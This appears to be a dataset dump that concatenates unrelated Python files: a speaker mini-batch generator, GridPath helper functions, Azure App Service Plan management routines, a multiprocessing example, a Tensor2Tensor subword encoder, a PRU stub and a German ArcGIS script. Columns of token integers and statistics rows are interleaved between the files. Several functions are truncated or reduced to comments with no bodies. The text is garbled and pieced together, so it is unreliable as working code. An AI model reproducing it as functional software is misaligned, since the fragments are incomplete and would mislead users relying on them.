8968,
353,
13,
44506,
1330,
1388,
198,
6738,
19751,
8968,
353,
1330,
3384,
4487,
198,
198,
16737,
796,
1012,
72,
49493... | 2.875486 | 257 |
# Code for generating mini-batches. The outout can be any
# combination of:
# features/0-stats/1-stats/i-vectors/labels/scp-indices
#
# scp-indices means which position in the data had. This
# can for example be used for looking up a trial weight
# from a list or for accessing data that is already
# loaded to the GPU.
#
# There are three different generators:
#
# gen_mbatch_spk_all_utts:
# Generates minibatches that each contains all the utterances
# from a small set of speakers. The batch size is controlled
# by setting The order of the speakers is "max_spk_per_batch"
# and "max_utt_per_batch". The order of speakers is
# determined by a function, "randomize_spk_id_order", which
# will be called before the training starts as well as after
# all speakers in the training set have been used. This function
# can be provided by the user. For example, it can be a function
# that simply randomizes the speakers. But we could also consider
# to make a function that puts e.g. 10 "similar" speakers in
# consequtively and max_spk_per_batch=10 to get them in the same
# batch.
# gen_mbatch_utt_groups
# This generator gives batches according to a list of "utterance groups"
# A function that generate the utterance groups needs to be provided.
# This function will be called before the training starts as well as
# after all data have been used so that it can be re-shuffled (or re-ordered
# according to some other rule)
# Assumming it gives [g1, g2,...] where gi is a group of utterances, e.g.,
# g1 = [u11, u12, u13,...]
# The generator has three options to form mini-batches.
# 1, "diag": Minibatches are (g1 - g1), (g2 - g2), (g3 - g3),...
# 2, "rowwise": Minibatches are (g1 - g1), (g1 - g2), (g1 - g3),...,(g2 - g2), (g2 - g3)..., (g3 - g3)
# All possible batches are looped throuhg in order. Advantage: One use the data more per
# copying to the GPU (BUT THIS REMAINS TO BE IMPLEMENTED.)
# Disadvantage: Consequetive batches, e.g. (g1 - g1) and (g1 - g2) are more statistically dependent.
# 3, "random": Minibatches are (gi - gj),... Indices "i" and "j" are generated randomly until all
# possible batces have been used
#
# gen_mbatch_trials --NOT IMPLEMENTED YET--
# Will take a list of (difficult) trials and divide into batches.
from utils.misc import get_logger
log = get_logger()
import h5py, os, time
from pympler.asizeof import asizeof
import sys
import numpy as np
import threading
########################################################################################
### General functions for processing the scp, loading data, etc.
####
# Gathers speaker info from an scp.
###
# Function for loading 0th and/or 1st order stats
########################################################################################
# Functions for arranging speakar IDs. The batch generator
# will call one of these functions whenever the whole data
# set has been looped through.
# This generator gives batches with all utterances from
# some speakers.
# ivec_dir, stats_dir, feat_dir should be either a path or None.
# If None, this data will not be loaded.
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
########################################################################################
# gen_mbatch_utt_groups
# ivec_dir, stats_dir, feat_dir
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
# This class generates batches from an an iterator like the one above.
# It creates an additional thread which is used to load data will
# the training is ongoing. The maximum number of batches it can keep
# in que is given by "batch_que_length".
class batch_iterator(object):
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
# As above but takes a list of iterators and and scp info corresponding to different sets.
# Each set will be used once per batch
class batch_iterator_multi_set(object):
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
####
# This class generates batches from an an iterator like the one above.
# It creates an additional thread which is used to load data will
# the training is ongoing. The maximum number of batches it can keep
# in que is given by "batch_que_length".
class batch_iterator_2(object):
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
# This should work though, toghether with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
| [
198,
198,
2,
6127,
329,
15453,
9927,
12,
8664,
2052,
13,
383,
503,
448,
460,
307,
597,
198,
2,
6087,
286,
25,
220,
198,
2,
3033,
14,
15,
12,
34242,
14,
16,
12,
34242,
14,
72,
12,
303,
5217,
14,
23912,
1424,
14,
1416,
79,
12,
... | 2.630297 | 2,832 |
# Copyright 2016-2020 Blue Marble Analytics LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Various auxiliary functions used in other modules
"""
from importlib import import_module
import os.path
import pandas as pd
import traceback
def get_required_subtype_modules_from_projects_file(
scenario_directory, subproblem, stage, which_type, prj_or_tx="project"
):
"""
Get a list of unique types from projects.tab.
"""
project_df = pd.read_csv(
os.path.join(
scenario_directory,
str(subproblem),
str(stage),
"inputs",
"{}s.tab".format(prj_or_tx),
),
sep="\t",
)
required_modules = project_df[which_type].unique()
return required_modules
def load_subtype_modules(required_subtype_modules, package, required_attributes):
"""
Load subtype modules (e.g. capacity types, operational types, etc).
This function will also check that the subtype modules have certain
required attributes.
:param required_subtype_modules: name of the subtype_modules to be loaded
:param package: The name of the package the subtype modules reside in. E.g.
capacity_type modules live in gridpath.project.capacity.capacity_types
:param required_attributes: module attributes that are required for each of
the specified required_subtype_modules. E.g. each capacity_type will
need to have a "capacity_rule" attribute.
:return: dictionary with the imported subtype modules
{name of subtype module: Python module object}
"""
imported_subtype_modules = dict()
for m in required_subtype_modules:
try:
imp_m = import_module("." + m, package=package)
imported_subtype_modules[m] = imp_m
for a in required_attributes:
if hasattr(imp_m, a):
pass
else:
raise Exception(
"ERROR! No "
+ str(a)
+ " function in subtype module "
+ str(imp_m)
+ "."
)
except ImportError:
print("ERROR! Unable to import subtype module " + m + ".")
traceback.print_exc()
return imported_subtype_modules
def join_sets(mod, set_name_list):
"""
Join sets in a list.
If list contains only a single set, return just that set.
:param mod:
:param set_name_list:
:return:
"""
if len(set_name_list) == 0:
return []
elif len(set_name_list) == 1:
return getattr(mod, set_name_list[0])
else:
joined_set = []
for s in set_name_list:
for element in getattr(mod, s):
joined_set.append(element)
return joined_set
def subset_init_by_param_value(mod, set_name, param_name, param_value):
"""
Initialize subset based on a param value.
:param set_name:
:param param_name:
:param param_value:
:return:
"""
return [
i for i in getattr(mod, set_name) if getattr(mod, param_name)[i] == param_value
]
def find_list_item_position(l, item):
"""
:param l:
:param item:
:return:
"""
return [i for i, element in enumerate(l) if element == item]
def check_list_items_are_unique(l):
"""
Check if items in a list are unique
:param l:
A list
:return:
Nothing
"""
for item in l:
positions = find_list_item_position(l, item)
check_list_has_single_item(
l=positions,
error_msg="Service "
+ str(item)
+ " is specified more than once"
+ " in generators.tab.",
)
def cursor_to_df(cursor):
"""
Convert the cursor object with query results into a pandas DataFrame.
:param cursor: cursor object with query result
:return:
"""
df = pd.DataFrame(
data=cursor.fetchall(), columns=[s[0] for s in cursor.description]
)
return df
def check_for_integer_subdirectories(main_directory):
"""
:param main_directory: directory where we'll look for subdirectories
:return: True or False depending on whether subdirectories are found
Check for subdirectories and return list. Only take subdirectories
that can be cast to integer (this will exclude other directories
such as "pass_through_inputs", "inputs", "results", "logs", and so on).
We do rely on order downstream, so make sure these are sorted.
"""
subdirectories = sorted(
[d for d in next(os.walk(main_directory))[1] if is_integer(d)], key=int
)
# There are subdirectories if the list isn't empty
return subdirectories
def is_integer(n):
"""
Check if a value can be cast to integer.
"""
try:
int(n)
return True
except ValueError:
return False
| [
2,
15069,
1584,
12,
42334,
4518,
36891,
30437,
11419,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,... | 2.483753 | 2,185 |
# -*- coding: utf-8 -*-
"""
Azure Resource Manager (ARM) Web App Service Plan Operations Execution Module
.. versionadded:: 3.0.0
:maintainer: <devops@eitr.tech>
:configuration: This module requires Azure Resource Manager credentials to be passed as keyword arguments
to every function or via acct in order to work properly.
Required provider parameters:
if using username and password:
* ``subscription_id``
* ``username``
* ``password``
if using a service principal:
* ``subscription_id``
* ``tenant``
* ``client_id``
* ``secret``
Optional provider parameters:
**cloud_environment**: Used to point the cloud driver to different API endpoints, such as Azure GovCloud.
Possible values:
* ``AZURE_PUBLIC_CLOUD`` (default)
* ``AZURE_CHINA_CLOUD``
* ``AZURE_US_GOV_CLOUD``
* ``AZURE_GERMAN_CLOUD``
"""
# Python libs
from __future__ import absolute_import
import logging
import datetime
# Azure libs
HAS_LIBS = False
try:
import azure.mgmt.web.models # pylint: disable=unused-import
from msrestazure.azure_exceptions import CloudError
from msrest.exceptions import ValidationError
from azure.mgmt.web.v2019_08_01.models._models_py3 import (
DefaultErrorResponseException,
)
HAS_LIBS = True
except ImportError:
pass
__func_alias__ = {"list_": "list"}
log = logging.getLogger(__name__)
async def create_or_update(
hub, ctx, name, resource_group, kind, sku="F1", reserved=None, tags=None, **kwargs,
):
"""
.. versionadded:: 3.0.0
Creates or updates an App Service Plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
:param kind: The kind of the App Service Plan. Possible values include: "linux", "windows", "functionapp"
:param sku: The SKU (pricing tier) of the App Service Plan. Defaults to "F1".
:param reserved: This value should be True if you are using a Linux App Service Plan, False otherwise.
Defaults to False.
:param tags: Tags associated with the App Service Plan.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.create_or_update test_name test_group test_kind test_sku
"""
if "location" not in kwargs:
rg_props = await hub.exec.azurerm.resource.group.get(
ctx, resource_group, **kwargs
)
if "error" in rg_props:
log.error("Unable to determine location from resource group specified.")
return {
"error": "Unable to determine location from resource group specified."
}
kwargs["location"] = rg_props["location"]
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
if not isinstance(sku, dict):
sku = {"name": sku}
try:
planmodel = await hub.exec.azurerm.utils.create_object_model(
"web",
"AppServicePlan",
sku=sku,
kind=kind,
reserved=reserved,
tags=tags,
**kwargs,
)
except TypeError as exc:
result = {
"error": "The object model could not be built. ({0})".format(str(exc))
}
return result
try:
plan = webconn.app_service_plans.create_or_update(
name=name, resource_group_name=resource_group, app_service_plan=planmodel,
)
plan.wait()
result = plan.result().as_dict()
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
except (ValidationError, DefaultErrorResponseException) as exc:
result = {"error": str(exc)}
return result
async def delete(hub, ctx, name, resource_group, **kwargs):
"""
.. versionadded:: 3.0.0
Delete an App Service Plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.delete test_name test_group
"""
result = False
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
plan = webconn.app_service_plans.delete(
name=name, resource_group_name=resource_group,
)
result = True
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
return result
async def get(hub, ctx, name, resource_group, **kwargs):
"""
.. versionadded:: 3.0.0
Get an App Service plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.get test_name test_group
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
plan = webconn.app_service_plans.get(
name=name, resource_group_name=resource_group,
)
result = plan.as_dict()
except AttributeError as exc:
result = {
"error": "The specified App Service Plan does not exist within the given resource group."
}
return result
async def get_server_farm_skus(hub, ctx, name, resource_group, **kwargs):
"""
.. versionadded:: 3.0.0
Gets all selectable SKUs for a given App Service Plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.get_server_farm_skus test_name test_group
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
skus = webconn.app_service_plans.get_server_farm_skus(
name=name, resource_group_name=resource_group,
)
result = skus
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
return result
async def list_(hub, ctx, resource_group=None, detailed=None, **kwargs):
"""
.. versionadded:: 3.0.0
Get all App Service plans for a subscription.
:param resource_group: The name of the resource group to limit the results.
:param detailed: Specify True to return all App Service Plan properties. The default is False, which returns a
subset of the properties. Retrieval of all properties may increase the API latency. If a resource group is
specified, then all App Service Plan properties are returned regardless of what this parameter is set to.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.list
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
if resource_group:
plans = await hub.exec.azurerm.utils.paged_object_to_list(
webconn.app_service_plans.list_by_resource_group(
resource_group_name=resource_group
)
)
else:
plans = await hub.exec.azurerm.utils.paged_object_to_list(
webconn.app_service_plans.list(detailed=detailed)
)
for plan in plans:
result[plan["name"]] = plan
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
except (DefaultErrorResponseException) as exc:
result = {"error": str(exc)}
return result
async def list_web_apps(hub, ctx, name, resource_group, skip_token=None, **kwargs):
"""
.. versionadded:: 3.0.0
Get all apps associated with an App Service plan.
:param name: The name of the App Service Plan.
:param resource_group: The name of the resource group.
:param skip_token: Skip to a web app in the list of webapps associated with app service plan. If specified, the
resulting list will contain web apps starting from (including) the skipToken. Otherwise, the resulting list
contains web apps from the start of the list.
CLI Example:
.. code-block:: bash
azurerm.web.app_service_plan.list_web_apps test_name test_group
"""
result = {}
webconn = await hub.exec.azurerm.utils.get_client(ctx, "web", **kwargs)
try:
apps = await hub.exec.azurerm.utils.paged_object_to_list(
webconn.app_service_plans.list_web_apps(
name=name, resource_group_name=resource_group, skip_token=skip_token
)
)
for app in apps:
result[app["name"]] = app
except CloudError as exc:
await hub.exec.azurerm.utils.log_cloud_error("web", str(exc), **kwargs)
result = {"error": str(exc)}
except (DefaultErrorResponseException) as exc:
result = {"error": str(exc)}
return result
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
26903,
495,
20857,
9142,
357,
33456,
8,
5313,
2034,
4809,
5224,
16205,
37497,
19937,
198,
198,
492,
2196,
29373,
3712,
513,
13,
15,
13,
15,
198,
198,
25,
7... | 2.509549 | 3,613 |
"""
For passing messages one can use Pipe() (for a connection between two processes)
or a queue (which allows multiple producers and consumers).
Returns a pair (conn1, conn2) of Connection objects representing the ends of a
pipe.
If duplex is True (the default) then the pipe is bidirectional. If duplex is
False then the pipe is unidirectional: conn1 can only be used for receiving
messages and conn2 can only be used for sending messages.
"""
import multiprocessing as mp
connection_1, connection_2 = mp.Pipe()
obj_to_send: object = 'hello'
connection_1.send(obj=obj_to_send)
obj_received = connection_2.recv()
print(obj_received)
| [
37811,
198,
1890,
6427,
6218,
530,
460,
779,
36039,
3419,
357,
1640,
257,
4637,
1022,
734,
7767,
8,
220,
198,
273,
257,
16834,
357,
4758,
3578,
3294,
11408,
290,
7008,
737,
198,
198,
35561,
257,
5166,
357,
37043,
16,
11,
48260,
17,
... | 3.394737 | 190 |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Encoders for text data.
* TextEncoder: base class
* SubwordTextEncoder: invertible
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from itertools import chain
import re
import time
import six
from six.moves import range # pylint: disable=redefined-builtin
# Reserved tokens for things like padding and EOS symbols.
PAD = "[PAD]"
EOS = "[EOS]"
UNK = "[UNK]"
CLS = "[CLS]"
SEP = "[SEP]"
MASK = "[MASK]"
RESERVED_TOKENS = [PAD, EOS, UNK, CLS, SEP, MASK]
NUM_RESERVED_TOKENS = len(RESERVED_TOKENS)
PAD_ID = RESERVED_TOKENS.index(PAD) # Normally 0
EOS_ID = RESERVED_TOKENS.index(EOS) # Normally 1
if six.PY2:
RESERVED_TOKENS_BYTES = RESERVED_TOKENS
else:
RESERVED_TOKENS_BYTES = [bytes(PAD, "ascii"), bytes(EOS, "ascii")]
# Regular expression for unescaping token strings.
# '\u' is converted to '_'
# '\\' is converted to '\'
# '\213;' is converted to unichr(213)
_UNESCAPE_REGEX = re.compile(r"\\u|\\\\|\\([0-9]+);")
_ESCAPE_CHARS = set(u"\\_u;0123456789")
_SPECIAL_CHARS = set(u"!\"\'#$%&*()`+,-./:;<=>?@[]^_{}~|")
# Unicode utility functions that work with Python 2 and 3
class TextEncoder(object):
"""Base class for converting from ints to/from human readable strings."""
@property
@property
def _escape_token(token, alphabet):
"""Escape away underscores and OOV characters and append '_'.
This allows the token to be expressed as the concatenation of a list
of subtokens from the vocabulary. The underscore acts as a sentinel
which allows us to invertibly concatenate multiple such lists.
Args:
token: A unicode string to be escaped.
alphabet: A set of all characters in the vocabulary's alphabet.
Returns:
escaped_token: An escaped unicode string.
Raises:
ValueError: If the provided token is not unicode.
"""
if not isinstance(token, six.text_type):
raise ValueError("Expected string type for token, got %s" % type(token))
token = token.replace(u"\\", u"\\\\").replace(u"_", u"\\u")
ret = [c if c in alphabet and c != u"\n" else r"\%d;" % ord(c) for c in token]
return u"".join(ret) + "_"
class SubwordTextEncoder(TextEncoder):
"""Class for invertibly encoding text using a limited vocabulary.
Invertibly encodes a native string as a sequence of subtokens from a limited
vocabulary.
A SubwordTextEncoder is built from a corpus (so it is tailored to the text in
the corpus), and stored to a file. See text_encoder_build_subword.py.
It can then be loaded and used to encode/decode any text.
Encoding has four phases:
1. Tokenize into a list of tokens. Each token is a unicode string of either
all alphanumeric characters or all non-alphanumeric characters. We drop
tokens consisting of a single space that are between two alphanumeric
tokens.
2. Escape each token. This escapes away special and out-of-vocabulary
characters, and makes sure that each token ends with an underscore, and
has no other underscores.
3. Represent each escaped token as a the concatenation of a list of subtokens
from the limited vocabulary. Subtoken selection is done greedily from
beginning to end. That is, we construct the list in order, always picking
the longest subtoken in our vocabulary that matches a prefix of the
remaining portion of the encoded token.
4. Concatenate these lists. This concatenation is invertible due to the
fact that the trailing underscores indicate when one list is finished.
"""
def __init__(self, filename=None):
"""Initialize and read from a file, if provided.
Args:
filename: filename from which to read vocab. If None, do not load a
vocab
"""
self._alphabet = set()
super(SubwordTextEncoder, self).__init__()
@property
def vocab_size(self):
"""The subtoken vocabulary size."""
return len(self._all_subtoken_strings)
def _escaped_token_to_subtoken_strings(self, escaped_token):
"""Converts an escaped token string to a list of subtoken strings.
Args:
escaped_token: An escaped token as a unicode string.
Returns:
A list of subtokens as unicode strings.
"""
# NOTE: This algorithm is greedy; it won't necessarily produce the "best"
# list of subtokens.
ret = []
start = 0
token_len = len(escaped_token)
while start < token_len:
for end in range(
min(token_len, start + self._max_subtoken_len), start, -1):
subtoken = escaped_token[start:end]
if subtoken in self._subtoken_string_to_id:
ret.append(subtoken)
start = end
break
else: # Did not break
# If there is no possible encoding of the escaped token then one of the
# characters in the token is not in the alphabet. This should be
# impossible and would be indicative of a bug.
assert False, "Token substring not found in subtoken vocabulary."
return ret
def build_from_token_counts(self,
token_counts,
min_count,
num_iterations=4,
reserved_tokens=None,
max_subtoken_length=None):
"""Train a SubwordTextEncoder based on a dictionary of word counts.
Args:
token_counts: a dictionary of Unicode strings to int.
min_count: an integer - discard subtokens with lower counts.
num_iterations: an integer. how many iterations of refinement.
reserved_tokens: List of reserved tokens. The global variable
`RESERVED_TOKENS` must be a prefix of `reserved_tokens`. If this
argument is `None`, it will use `RESERVED_TOKENS`.
max_subtoken_length: Maximum length of a subtoken. If this is not set,
then the runtime and memory use of creating the vocab is quadratic in
the length of the longest token. If this is set, then it is instead
O(max_subtoken_length * length of longest token).
Raises:
ValueError: if reserved is not 0 or len(RESERVED_TOKENS). In this case, it
is not clear what the space is being reserved for, or when it will be
filled in.
"""
if reserved_tokens is None:
reserved_tokens = RESERVED_TOKENS
else:
# There is not complete freedom in replacing RESERVED_TOKENS.
for default, proposed in zip(RESERVED_TOKENS, reserved_tokens):
if default != proposed:
raise ValueError("RESERVED_TOKENS must be a prefix of "
"reserved_tokens.")
start_time = time.time()
# Initialize the alphabet. Note, this must include reserved tokens or it can
# result in encoding failures.
alphabet_tokens = chain(six.iterkeys(token_counts),
[native_to_unicode(t) for t in reserved_tokens])
# all alphabets in tokens
self._init_alphabet_from_tokens(alphabet_tokens)
# Bootstrap the initial list of subtokens with the characters from the
# alphabet plus the escaping characters.
self._init_subtokens_from_list(list(self._alphabet),
reserved_tokens=reserved_tokens)
# We build iteratively. On each iteration, we segment all the words,
# then count the resulting potential subtokens, keeping the ones
# with high enough counts for our new vocabulary.
if min_count < 1:
min_count = 1
for i in range(num_iterations):
# Collect all substrings of the encoded token that break along current
# subtoken boundaries.
subtoken_counts = collections.defaultdict(int)
for token, count in six.iteritems(token_counts):
iter_start_time = time.time()
escaped_token = _my_escape_token(token, self._alphabet)
subtokens = self._escaped_token_to_subtoken_strings(escaped_token)
# excaped_token '_1234' -> subtoknes ['_12', '34'] (ex)
# '_1234':100 -> '_', '_1', '_12', '_123', '_1234','3', '34' :+= 100,
start = 0
for subtoken in subtokens:
last_position = len(escaped_token) + 1
if max_subtoken_length is not None:
last_position = min(last_position, start + max_subtoken_length)
for end in range(start + 1, last_position):
new_subtoken = escaped_token[start:end]
subtoken_counts[new_subtoken] += count
start += len(subtoken)
iter_time_secs = time.time() - iter_start_time
# Array of sets of candidate subtoken strings, by length.
len_to_subtoken_strings = []
for subtoken_string, count in six.iteritems(subtoken_counts):
lsub = len(subtoken_string)
if count >= min_count:
while len(len_to_subtoken_strings) <= lsub:
len_to_subtoken_strings.append(set())
len_to_subtoken_strings[lsub].add(subtoken_string)
# Consider the candidates longest to shortest, so that if we accept
# a longer subtoken string, we can decrement the counts of its prefixes.
new_subtoken_strings_with_count = []
for lsub in range(len(len_to_subtoken_strings) - 1, 0, -1):
subtoken_strings = len_to_subtoken_strings[lsub]
for subtoken_string in subtoken_strings:
count = subtoken_counts[subtoken_string]
if count >= min_count:
# Exclude alphabet tokens here, as they must be included later,
# explicitly, regardless of count.
if subtoken_string not in self._alphabet:
new_subtoken_strings_with_count.append((count, subtoken_string))
for l in range(1, lsub):
subtoken_counts[subtoken_string[:l]] -= count
# Include the alphabet explicitly to guarantee all strings are encodable.
new_subtoken_strings_with_count.extend((subtoken_counts.get(a, 0), a)
for a in self._alphabet)
new_subtoken_strings_with_count.sort(reverse=True)
# Reinitialize to the candidate vocabulary.
new_subtoken_strings = [subtoken for _, subtoken in new_subtoken_strings_with_count]
if reserved_tokens:
# escaped_reserved_tokens = [
# _escape_token(native_to_unicode(t), self._alphabet)
# for t in reserved_tokens
# ]
# new_subtoken_strings = escaped_reserved_tokens + new_subtoken_strings
new_subtoken_strings = reserved_tokens + new_subtoken_strings
self._init_subtokens_from_list(new_subtoken_strings)
# tf.logging.info("vocab_size = %d" % self.vocab_size)
# print(self.vocab_size)
self.subtokens_with_counts = new_subtoken_strings_with_count
# Frequency of "_" is high.
# So remove from current position and add to the last.
new_subtoken_strings.remove("_")
new_subtoken_strings.insert(len(new_subtoken_strings), "_")
oov_list = []
for idx, subtoken in enumerate(new_subtoken_strings):
if subtoken.startswith("_") and subtoken != "_":
new_subtoken_strings[idx] = subtoken[1:]
elif subtoken[0] in self._alphabet and subtoken not in reserved_tokens:
new_subtoken_strings[idx] = "##" + subtoken
else:
oov_list.append(subtoken)
new_subtoken_strings.extend(char for char in self._alphabet
if char not in new_subtoken_strings)
# print(new_subtoken_strings)
print("total vocab size : {}, {} seconds elapsed ".format(self.vocab_size, time.time() - start_time))
# print(oov_list)
self._init_subtokens_from_list(new_subtoken_strings)
def _init_subtokens_from_list(self, subtoken_strings, reserved_tokens=None):
"""Initialize token information from a list of subtoken strings.
Args:
subtoken_strings: a list of subtokens
reserved_tokens: List of reserved tokens. We must have `reserved_tokens`
as None or the empty list, or else the global variable `RESERVED_TOKENS`
must be a prefix of `reserved_tokens`.
Raises:
ValueError: if reserved is not 0 or len(RESERVED_TOKENS). In this case, it
is not clear what the space is being reserved for, or when it will be
filled in.
"""
if reserved_tokens is None:
reserved_tokens = []
if reserved_tokens:
self._all_subtoken_strings = reserved_tokens + subtoken_strings
else:
self._all_subtoken_strings = subtoken_strings
# we remember the maximum length of any subtoken to avoid having to
# check arbitrarily long strings.
self._max_subtoken_len = max([len(s) for s in subtoken_strings])
self._subtoken_string_to_id = {
s: i + len(reserved_tokens)
for i, s in enumerate(subtoken_strings) if s
}
# Initialize the cache to empty.
self._cache_size = 2 ** 20
self._cache = [(None, None)] * self._cache_size
def _init_alphabet_from_tokens(self, tokens):
"""Initialize alphabet from an iterable of token or subtoken strings."""
# Include all characters from all tokens in the alphabet to guarantee that
# any token can be encoded. Additionally, include all escaping characters.
self._alphabet = {c for token in tokens for c in token}
self._alphabet |= _ESCAPE_CHARS
self._alphabet |= _SPECIAL_CHARS
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
15069,
2864,
383,
309,
22854,
17,
51,
22854,
46665,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2... | 2.632599 | 5,264 |
from __future__ import print_function
from __future__ import division
import os
import mmap
import struct
import re
import pasm
#Pass in the range of addresses we want to cover, and size the mmap accordingly
#TODO: Also check to see if the PRU is asleep
#NOTE: This function returns a dictionary oject with state information in a format that mirrors the front-end model state | [
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
198,
11748,
28686,
198,
11748,
8085,
499,
198,
11748,
2878,
198,
11748,
302,
198,
198,
11748,
279,
8597,
628,
220,
220,
220,
1303,
14478,
287,... | 3.805825 | 103 |
# ArcGIS Skript
#
# Zweck:
# Anpassen von Haltungs- und Hausanschlussdaten mithilfe von Schachtsohlen
#
# Anmerkungen:
# Kommentare sind in Englisch verfasst, nur die ausgegebenen Nachrichten sind auf Deutsch.
# Damit wird möglichst viel Arbeit vermieden, falls das Skript mal bei Bedarf auf Englisch ausgeführt werden sollte.
# Der Ausgabeordner wird vor dem Ausführen nicht geleert, aus Übersichtsgründen sollte dieser also vorher leer sein.
#
# Für aktuelle Verwendung zu nutzende Parameter in ArcGis:
# Haltungen: haltungen_neustadt.shp Ursprungsdaten.
# Anschlüsse: anschlussleitung.shp Ursprungsdaten.
# Schächte: schacht_adjust_3d_z.shp Das manuell angepasste Feature der Schachtsohlen.
# Ausgabeordner: <user-defined> Sollte ein leerer Ordner sein. (Erzeugt viele Dateien)
#
# © Hochschule Bremen, 2021-2022
# Autor: Alexander Fritsch
import os
import math
import time
import copy
import arcpy
from arcpy import env
def logFeatureClasses(mode):
"""**Logs all feature classes in the output folder** to log.txt within the output folder.
:param string mode: The file mode to use. Values: "w", "a"
"""
if mode != "w" and mode != "a":
raise ValueError('Use "w" (write) or "a" (append) as mode.')
# Create feature classes array
featureClasses = arcpy.ListFeatureClasses()
# Open log file
with open('log.txt', mode) as file:
# Iterate through feature classes
for featureClass in featureClasses:
path = os.path.join(arcpy.env.workspace, featureClass)
file.write("Feature class: {0}\n".format(path))
# Create fields array
fields = arcpy.ListFields(featureClass)
for field in fields:
file.write(" Field: {0}\n".format(field.name))
file.write(" Type: {0}\n".format(field.type))
file.write(" Alias: {0}\n".format(field.aliasName))
#arcpy.CalculateField_management(haltung_intermediate, "haltung_XY", "[haltung_X]+[haltung_Y]")
file.write("\n")
# -------------------------------------------------------------------------------------#
def updateProgress(label, position=None):
"""**Updates the arcpy progress bar**
:param string label: What to write into the label box.
:param int position: [optional] The percentage for the progress bar.
:returns: void
"""
if label:
arcpy.SetProgressorLabel(label)
else:
raise ValueError("Please specify a label when updating progress bar.")
if position:
arcpy.SetProgressorPosition(position)
else:
arcpy.SetProgressorPosition()
